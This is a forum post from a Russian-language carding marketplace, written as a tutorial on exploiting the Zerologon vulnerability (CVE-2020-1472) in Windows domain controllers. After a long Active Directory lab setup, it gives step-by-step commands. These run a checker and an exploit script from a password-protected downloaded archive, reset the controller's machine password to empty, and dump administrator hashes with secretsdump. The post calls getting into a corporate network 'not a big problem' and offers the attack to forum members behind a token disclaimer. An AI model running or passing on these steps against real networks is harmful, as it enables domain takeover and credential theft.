Привет, гость!

Добро пожаловать на CVVBOARD - крупнейший теневой кардинг форум. У нас Вы сможете найти огромное множество статей по теме кардинга и заработка в интернете. Актуальная информация, новости даркнета, сервисы от проверенных продавцов, эксклюзивные, только рабочие схемы заработка, ежедневные раздачи - все это Вы найдете на нашем форуме! Не пренебрегайте услугами Гарант-Сервиса это убережет Вас от мошенников. Обратите внимание, звание модератора не является гарантом в сделках!

Эскплоит Zelogon

Download_Link

Участник клуба
Регистрация
7 Июл 2020
Сообщения
404
Реакции
58
Депозит
200$
ДИСКЛЕЙМЕР: Статья предоставлена исключительно в образовательных целях. Мы не несём ответственность за ваши действия!
Приветствуем всех! в этой статье мы расскажем про уязвимость Zerologon(CVE-2020-1472), а также разберём её применение.

В чем суть уязвимости Zerologon?
По большому счету, уязвимость CVE-2020-1472 заключается в несовершенстве схемы криптографической аутентификации Netlogon Remote Protocol. Этот протокол используется для аутентификации пользователей и машин в сетях, построенных на базе домена. В частности, Netlogon служит и для удаленного обновления паролей компьютеров. Уязвимость позволяет злоумышленнику выдать себя за компьютер-клиент и заменить пароль контроллера домена (сервера, контролирующего всю сеть, в том числе запускающего службы Active Directory). В результате атакующий может получить права администратора домена.

Кто уязвим?

Уязвимость CVE-2020-1472 актуальна для компаний, сети которых построены на базе контроллеров доменов под управлением операционных систем Windows.
В частности, злоумышленники могут захватить контроллер домена на базе:
  • всех версий Windows Server 2019, Windows Server 2016;
  • всех вариантов Windows Server версии 1909;
  • Windows Server версии 1903;
  • Windows Server версии 1809 (Datacenter, Standard);
  • Windows Server 2012 R2;
  • Windows Server 2012;
  • Windows Server 2008 R2 Service Pack 1.
Правда, для успешной атаки злоумышленникам сначала необходимо проникнуть в корпоративную сеть, но это не такая большая проблема.


Как же реализовать уязвимость?

Сейчас мы с вами разберём реализацию данной уязвимости, на примере тестового сервера.Настроим его так, будто это контроллер домена какой-то организации, правда без большого количества пользователей в сети.


Нам необходим сервер, для этого создадим виртуальную машину/возьмём дедик(удалённый сервер), например на windows server 2012 r2.
После установки, нам необходимо настроить на нём AD (Active Directory):
В интернете много туториалов по созданию Active Directory, поэтому просто опишем происходящее:


Установка Active Directory Domain Service
Откройте Диспетчер серверов и выберете пункт «Add roles and features».

1.png

Dashboard

В качестве типа установки укажите Role-based or feature-based installation.

2.png

Installation Type

Выберете ваш сервер из пула.

3.png

Select a server from the server pool

В следующем окне отметьте Active Directory Domain Services (Доменные службы Active Directory).

4.png

Roles

Добавьте компоненты.

5.png

Add Features

Установите все отмеченные компоненты на VPS с помощью кнопки Установить.

6.png

Install


НАСТРОЙКА

В поиске введите dcpromo и откройте одноименную утилиту.

7.png

dcpromo

В открывшемся окне нажмите Ok.

8.png

Installer

После этого откройте Диспетчер серверов, в вертикальном меню у вас появится вкладка AD DS.

9.png

AD DS

В горизонтальном меню нажмите на восклицательный знак и выберете Promote this server to a domain controller (Повысить роль этого сервера до уровня контроллера).

10.png

Promote this server..

В появившемся окне настроек выберите Добавить новый лес (т.к. действия выполняются впервые) и введите ваше доменное имя.
Примечания:
- Имя корневого домена леса не может быть однокомпонентным (например, он должен быть «company.local» вместо «company»);
- Домен должен быть уникальным;

11.png

Deployment Configuration

На следующем шаге введите и подтвердите пароль для режима восстановления служб каталогов.

12.png

Пароль

На этом шаге просто нажмите Next.

13.png

DNS Options

Укажите удобное имя домена NetBIOS.

14.png

Additional Option

Укажите пути до базы данных AD DS, файлов журналов и папки SYSVOL. Рекомендуем оставить значения по умолчанию.

15.png

Paths

Проверьте настроенные параметры.

16.png



Дождитесь проверки предварительных требований после чего нажмите Установить. После установки сервер будет перезагружен.

17.png

Install


Создание учетных записей
Для создания новых учетных записей и администраторов откройте оснастку Active Directory Users and Computers, для этого откройте Диспетчер серверов и перейдите в раздел AD DS. В контекстном меню сервера выберете соответствующую оснастку.

18.png

Server Manager

В новом окне разверните дерево вашего домена и найдите каталог с пользователями Users. Правой кнопкой мыши нажмите на каталог и выберете Создать -> Пользователь.

19.png

Users

Для нового пользователя задайте личные данные и имя входа.

20.png

New Object

Далее введите пароль, который должен быть достаточно сложным и содержать буквы разного регистра и цифры. Дополнительные опции выберите на свое усмотрение.

21.png

Пароль

Создайте нового пользователя.

22.png

Finish

Чтобы пользователь мог управлять службами Active Directory, его необходимо добавить в группу Domain Admins. Для этого с помощью правой кнопки мыши откройте свойства пользователя и перейдите во вкладку Member Of. Нажмите кнопку Add для добавления в группу.

23.png

Add..

Выполните поиск группы Domain Admins(Администраторы домена) с помощью кнопки Check Names. Нажмите OK.

24.png

Check

Сохраните изменения кнопкой Apply.

25.png

Apply

Теперь созданный пользователь сможет подключиться к контроллеру домена.
Готово, мы настроили Active Directory. Теперь пришло время уязвимости.

Для начала воспользуемся чекером на уязвимость:
Скачиваем Python
Скачиваем архив со всеми утилитами:Клик
ПАРОЛЬ НА АРХИВ: 777

После установки питона, устанавливаем доп.модули:
открываем powershell и прописываем:
pip install pysmb
pip install impacket
pip install pyfiglet
Теперь перейдём к архиву.Распаковываем его, и откроем папку "чекер".

4a1d1b8cf44d0653cbf2b.png


копируем путь, идём в powershell и перейдём в папку чекер:
cd {путь}
запустим чекер:
python check_cve-2020-1472.py --ip {ip сервера}

dbde3993eace33db1f736.png



60e374e9db50b27cc9e92.png


Success! Чекером мы подтвердили возможность реализации уязвимости на данном устройстве.

Эксплоит
Для начала необходимо провести некоторые манипуляции с модулем impacket:
переходим по пути:
C:\Users\Администратор\AppData\Local\Programs\Python\Python38-32\Lib\site-packages

7d750984220d4dc39e50f.png



и удаляем папку impacket.Переносим туда папку impacket из архива

951e3441e188216ffbd22.png


Теперь копируем путь папки эксплоит, и переходим в неё в powershell
прописываем команду: python cve-2020-1472-exploit.py -n {имя компьютера} -t {IP}

73d302cb9698981ff2ca8.png


найти IP и имя компьютера можно по команде ipconfig /all

1083c5c7da6b599d233b4.png


после запуска нам скажут,уязвимо ли устройство к атаке, а также попросят подтвердить выполнение эксплоита:

64c1754d1a9a593ddf142.png

вводим y

c1e6422e48615a6beefe5.png


Теперь пароль домен контроллера выставлен пустой строкой.
Теперь мы можем получить локальные хеши учёток(в том числе и администратора):
secretsdump.py DOMAIN/DC_NETBIOS_NAME$@IP


7c3386723e270bb71d438.png


А дальше уже можно залогиниться под учётной записью администратора, и иметь высокие привилегии.
 

stefann

Опытный user
Регистрация
17 Апр 2019
Сообщения
54
Реакции
0
мне дадут какую-то ачивку, за то, что я всё это прочитал?
 

jeff10

Опытный user
Регистрация
17 Сен 2017
Сообщения
199
Реакции
5
stefann написал(а):
мне дадут какую-то ачивку, за то, что я всё это прочитал?
Если ты еще и понял что-то, тогда да
 
Сверху Снизу